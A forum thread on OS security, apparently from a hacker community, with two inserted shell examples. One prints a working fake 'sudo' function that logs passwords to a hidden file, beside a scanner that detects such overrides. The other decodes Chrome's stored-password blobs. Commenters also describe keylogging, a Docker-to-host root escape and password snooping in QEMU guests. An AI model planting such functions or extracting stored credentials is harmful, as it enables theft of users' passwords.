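A concrete version of the "simply aliasing sudo" point made above, as an added example that is not this commenter's code: a constructed rc-file snippet showing how a shell function named `sudo` can shadow the real binary and see the password first, next to a check that scans rc files for such overrides. The rc-file names and the sample content are assumptions made for the demo.

```shell
#!/bin/sh
# Added example, not from the thread. Shows the shape of a "sudo" override
# planted in a user's shell rc file, and a check that finds such overrides.
# The rc content below is constructed for this demo, not taken from a real host.

# Constructed sample of an rc file an attacker has appended to. Because the
# function is named "sudo", interactive shells run it instead of /usr/bin/sudo:
# it collects the password itself, stashes it, and only then calls the real
# binary (via "command sudo -S") so the user sees the normal behaviour.
SAMPLE_RC='
export PATH=$HOME/.local/bin:$PATH
alias ll="ls -la"
sudo() {
    printf "[sudo] password for %s: " "$USER"
    stty -echo; read -r pw; stty echo; echo
    printf "%s\n" "$pw" >> "$HOME/.cache/.s"
    printf "%s\n" "$pw" | command sudo -S "$@"
}
'

# Lines that alias or redefine privilege-gaining commands, in either the
# "alias sudo=..." form or the "sudo() {" / "function sudo" form.
OVERRIDE_RE='^[[:space:]]*(alias[[:space:]]+(sudo|su|doas)=|(function[[:space:]]+)?(sudo|su|doas)[[:space:]]*\(\))'

# Print matching lines of an rc file with line numbers (empty output = clean).
find_rc_overrides() {
    grep -nE "$OVERRIDE_RE" "$1" || true
}

# Count matching lines; 0 means no override found in that file.
count_rc_overrides() {
    grep -cE "$OVERRIDE_RE" "$1" || true
}

# Live check for the current shell. Aliases and functions only exist in the
# interactive shell that sourced the rc file, so run this from your terminal
# (or just run "type sudo"). "command -v" prints an absolute path for the real
# binary, but an alias definition or the bare name for an alias/function.
# Remove a planted override with: unalias sudo 2>/dev/null; unset -f sudo
sudo_is_real_binary() {
    case "$(command -v sudo 2>/dev/null)" in
        /*) return 0 ;;
        *)  return 1 ;;
    esac
}

# Demo: scan the constructed rc file, then the usual rc files of this user.
demo() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_RC" > "$tmp"
    echo "constructed rc: $(count_rc_overrides "$tmp") override(s)"
    find_rc_overrides "$tmp"
    rm -f "$tmp"
    for f in "$HOME/.bashrc" "$HOME/.bash_profile" "$HOME/.profile" "$HOME/.zshrc"; do
        [ -f "$f" ] && echo "$f: $(count_rc_overrides "$f") override(s)"
    done
    return 0
}

demo
```

The regex only catches overrides defined in the scanned file; an attacker can also source a second file or drop a fake `sudo` earlier in `PATH`, which is why the live `type sudo` / `command -v sudo` check belongs in the routine too.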
> All the mentioned ways require admin privileges or even group policy privileges. I'm doing it without any permissions.
Oh, nice :)
> They're doing the best they can, but the Win-APIs are too powerful and there is no sandbox (like those for Mac) in place.
Hmmmm.
> Mac has its own sandbox and Linux offers SELinux and I was talking about a security vulnerability I have written for Windows specifically, that's why I gave the tip for Sandboxie.
I have to admit I've never really poked SELinux. My understanding of it is that because it was bolted-on, both architecturally and conceptually, that getting the most out of it is a real pain. This has put me off. :/ (heh)
>> I would be extremely interested to hear some of the ways you'd particularly go about attacking Linux, which I use everyday.
> Sorry, I can't talk about this specific attack in detail because this vulnerability can't be fixed. It's conceptually fairly simple and <400 LoC and I'm sure you can find it on your own if you're determined.
Righteo then *writes program that generates all possible C programs <400 LoC long*
In all seriousness, you definitely have me interested now :) I guess what might be a relevant question is, how universally applicable is it? Would it run on my minimally-configured Slackware box, for example?
And I am _very_ fascinated to hear that this "cannot be fixed". Are you describing a Linux-specific Spectre/Meltdown?
To be honest I'm not really sure what I'm interested in, you could sort of describe where I'm at as somewhat similar to your post 8 months ago about finding your passion. (In my case it's a resource thing.) I've started playing with X11 recently though, to the extent of just learning the wire protocol for fun.
I was actually thinking of making a tiny Xlib-less keylogger the other day, haha. (As in, talking to X via write()/read() directly.) Not quite sure why; perhaps the theoretically-interesting scenario of "not linking to libX11 might be less suspicious?" could be one explanation. I don't seem to need to give myself a rationale to stay motivated on my current track (woohoo), so I'm just tinkering for now.
Uh - getting root on Linux isn't exactly straightforward! Although there was that one time I found a very confused Docker installation (running Ubuntu on CentOS... I'd never used Docker before and could not figure out which way was up ("wat, I have yum AND ap--wait no now apt-get disappeared where did it go"), for about an hour lol) and this system may or may not have left /dev/vda1 in the Docker image... and it may have allowed me to mount it read-write from under the host system, with effective UID 0... ._. (IIRC, I think it was visudo that worked great.)
I wonder if there's a password manager that stores data in the kernel and/or uses the kernel's crypto keyring - and whether such effort would be worth it? (At least this would thwart local attacks, and only remote attacks via the Wi-Fi stack would work. xD)
I've fished forgotten passwords out of Login Data more times than I have fingers, I think. sqlite3 .dump + printf "$(sed 's/../\\x&/g')" FTW.
Linux's non-umbrella model, where there's no cohesive oversight, will be its undoing, I think.
On the subject of AV my favorite thing is https://github.com/taviso/loadlibrary :P (if just for the very non-official "you totally know Google is using this every day.")
One thing I was vaguely considering (last night, actually) was an idea I've had for a while - taking forensic memory-dump analysis tools to the next level and making them work in realtime with QEMU. End result being, you run a tool as root with the PID to a running QEMU instance, it attaches (possibly via process_vm_{read,write}v) and lets you watch VT streams, see keys+passwords being typed in SSH, perhaps take screenshots, see the process tree, etc.
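The decode step behind the `sqlite3 .dump` + `sed` + `printf` trick mentioned above, and the "extract stored passwords from Chrome" point made earlier in the thread, as an added example that is not any commenter's code: `sqlite3 .dump` writes BLOB columns as `X'hex'`, and this turns that back into bytes and reads off the version tag. The dump line is constructed (a fake `v10` prefix followed by 16 arbitrary bytes), and the profile path in the comments is an assumption about a default Chrome install on Linux.

```shell
#!/bin/sh
# Added example, not from the thread. Decodes the X'hex' blobs that
# `sqlite3 "Login Data" .dump` emits for the password_value column.
# SAMPLE_DUMP_LINE is constructed for this demo; the real logins table has
# more columns, only the shape of the blob matters here.
SAMPLE_DUMP_LINE="INSERT INTO logins VALUES('https://example.com/login','alice',X'76313000112233445566778899aabbccddeeff');"

# Pull the X'...' token out of one dump line.
blob_from_dump_line() {
    printf '%s\n' "$1" | sed -n "s/.*\\(X'[0-9A-Fa-f]*'\\).*/\\1/p"
}

# Strip the X'...' wrapper, leaving bare hex.
blob_hex() {
    _h=${1#X\'}
    printf '%s' "${_h%\'}"
}

# Hex to raw bytes. The one-liner from the thread is
#   printf "$(printf '%s' "$hex" | sed 's/../\\x&/g')"
# which needs a printf that understands \x (bash, GNU coreutils). This
# version emits octal escapes, which every POSIX printf accepts, so it also
# works under dash and busybox.
hex_to_bytes() {
    _in=$1
    while [ -n "$_in" ]; do
        _pair=${_in%"${_in#??}"}     # first two hex digits
        _in=${_in#??}
        printf "\\$(printf '%03o' "0x$_pair")"
    done
}

# Chrome prefixes encrypted password_value blobs with a 3-byte version tag
# ("v10", or "v11" on Linux when a keyring is used). Decoding the hex gets
# you this tag plus ciphertext; recovering the plaintext still needs the
# store key, which is what the keyring/DPAPI protects.
blob_version() {
    hex_to_bytes "$(printf '%.6s' "$(blob_hex "$1")")"
}

# Ciphertext length in bytes: everything after the version tag.
blob_cipher_len() {
    _hex=$(blob_hex "$1")
    echo $(( (${#_hex} - 6) / 2 ))
}

# Demo on the constructed line. On a real profile you would copy the database
# first (Chrome keeps it locked while running) and loop over
#   sqlite3 ./Login\ Data .dump | grep 'INSERT INTO logins'
# with the copy taken from, e.g., ~/.config/google-chrome/Default/Login\ Data
blob=$(blob_from_dump_line "$SAMPLE_DUMP_LINE")
echo "blob:       $blob"
echo "version:    $(blob_version "$blob")"
echo "ciphertext: $(blob_cipher_len "$blob") bytes"
hex_to_bytes "$(blob_hex "$blob")" | od -An -tx1
```

The octal form matters when the decoded blob is piped into a decryption step: a byte such as `0x25` comes out as a literal `%` rather than being re-read as a format directive, and `0x00` survives as a NUL, which the `\x` shortcut handles only on printf implementations that support it.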
A friend of mine is running SmashTheStack. He has built an IT sec company in the past (and sold it), maybe you can learn something from the war games. People from Project Zero and very clever people from Stanford are active in the community - those are top-notch hackers.
It's very low-level stuff, but if you like, try to hack those servers. Have fun!